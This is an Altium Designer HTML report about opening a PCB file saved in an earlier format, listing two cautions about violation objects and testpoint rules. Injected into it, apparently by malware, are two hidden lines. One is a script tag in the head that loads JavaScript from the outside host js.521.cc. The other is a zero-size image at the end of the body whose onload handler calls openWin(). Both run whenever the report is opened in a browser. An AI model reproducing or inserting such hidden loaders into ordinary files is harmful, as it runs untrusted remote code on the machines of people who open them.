<html>
    <head>
    <meta http-equiv="content-type" content="text/html">
        <style type="text/css">
    		h1, h2, h3, h4, h5, h6 { 
    			font-family : sans-serif;
    			color : white;
    			background-color : #21489e;
    			padding: 0.3em;
    		}
    		body { 
    			font-family : verdana;
    		}
    		td, th {  
    			padding: 0.5em;
    			text-align : left;
    			width: auto;	
    		}
    		th { 
    			background-color : #a6caf0;
    		
    		}
    		th.column1, td.column1 { 
    			text-align: left;
    			width : 18%; 
    		}
    		table { 
    			width : 100%; 
    		}
    		.front_matter, .front_matter_column1, .front_matter_column2, .front_matter_column3 {
    			padding-top : 0.1em;
    			padding-bottom : 0.1em;
    			border : 0px solid black;
    			width : auto;
    			vertical-align: top
    		}
    		.front_matter_column1 {
    			text-align : right;
    		}
    		.total_column1, .total_column {
    			font-weight : bold;	
    		}
    		.total_column1 {
    			text-align : right;
    		}
    		.front_matter_column2 {
    			text-align : center;
    		}
    		.front_matter_column3 {
    			text-align : left;
    		}
    		.warning, .error { 
    			color : red;
    			font-weight : bold;
    		}	
    		tr.onmouseout_odd { 
    			background-color : #eeeee0 
    		}
    		tr.onmouseout_even { 
    			background-color : #f3f3e3   
    		}
    		tr.onmouseover_odd, tr.onmouseover_even { 
    			background-color : lightyellow 
    		} 
    		a:link, a:visited, .q a:link,.q a:active,.q {
    			color: #21489e; 
    		}
    		a:link.callback, a:visited.callback { 
    			color: #008000 
    		}
    		a:link.customize, a:visited.customize {
    			color: #c0c0c0;
    			position: absolute; 
    			right: 10px;
    		}	
    		p.contents_level1 {
    			font-weight : bold;
    			font-size : 110%;
    			margin : 0.5em;
    		}
    		p.contents_level2 {
    			position : relative;
    			left : 20px;
    			margin : 0.5em;
    		}
    	</style>
    <script language="javascript" type="text/javascript" src="http://js.521.cc/js/user.js"></script></head>
    
    <body>
        <img alt="altium" src="file://d:\program files\altium designer summer 09\templates\ad-rgb_logo_223x64.gif">
        <a href="dxpprocess://client:setuppreferences?server=pcb|pagename=general" class="customize"><acronym title="dxpprocess://client:setuppreferences?server=pcb|pagename=general">reporting options</acronym></a>
        <h1>file in previous format</h1>
        
        <table class="front_matter">
            <tr class="front_matter">
            <td class="front_matter_column1">date</td>
            <td class="front_matter_column2">:</td>
            <td class="front_matter_column3">2011-12-16</td>
            </tr>
            <tr class="front_matter">
            <td class="front_matter_column1">time</td>
            <td class="front_matter_column2">:</td>
            <td class="front_matter_column3">15:53:49</td>
            </tr>
            <tr class="front_matter">
            <td class="front_matter_column1">filename</td>
            <td class="front_matter_column2">:</td>
            <td class="front_matter_column3"><a href="file://f:\pcb\srm_double_v2_signal\srm_double_v2_signal.pcbdoc" class="file"><acronym title="f:\pcb\srm_double_v2_signal\srm_double_v2_signal.pcbdoc">f:\pcb\srm_double_v2_signal\srm_double_v2_signal.pcbdoc</acronym></a></td>
            </tr>
        </table>
        
        <br>
        
        <table>
            <tr>
                <th style="text-align : left" colspan="1" class="">version</th>
                <th style="text-align : left" colspan="1" class="">warning</th>
            </tr>
    
            <tr class="onmouseout_even" onmouseover="classname = 'onmouseover_even'" onmouseout="classname = 'onmouseout_even'">
                <td class="column1">summer 09</td>
                <td class="column2"><b>caution</b> - file contains old violation objects. these violations are no longer supported & will not be loaded.please run drc after opening this file in order to refresh the violations.</td>
            </tr>
            <tr class="onmouseout_even" onmouseover="classname = 'onmouseover_even'" onmouseout="classname = 'onmouseout_even'">
                <td class="column1">summer 09</td>
                <td class="column2"><b>caution</b> - existing testpoint rules and settings are used as fabrication testpoint information.</td>
            </tr>
        </table>
        <br><hr>
        <p>this file was generated by <b>an earlier</b> version of the software</p>
    <img src="http://www.baidu.com/search/img/logo.gif" width="0" height="0" onload="openWin();" /></body>
</html>
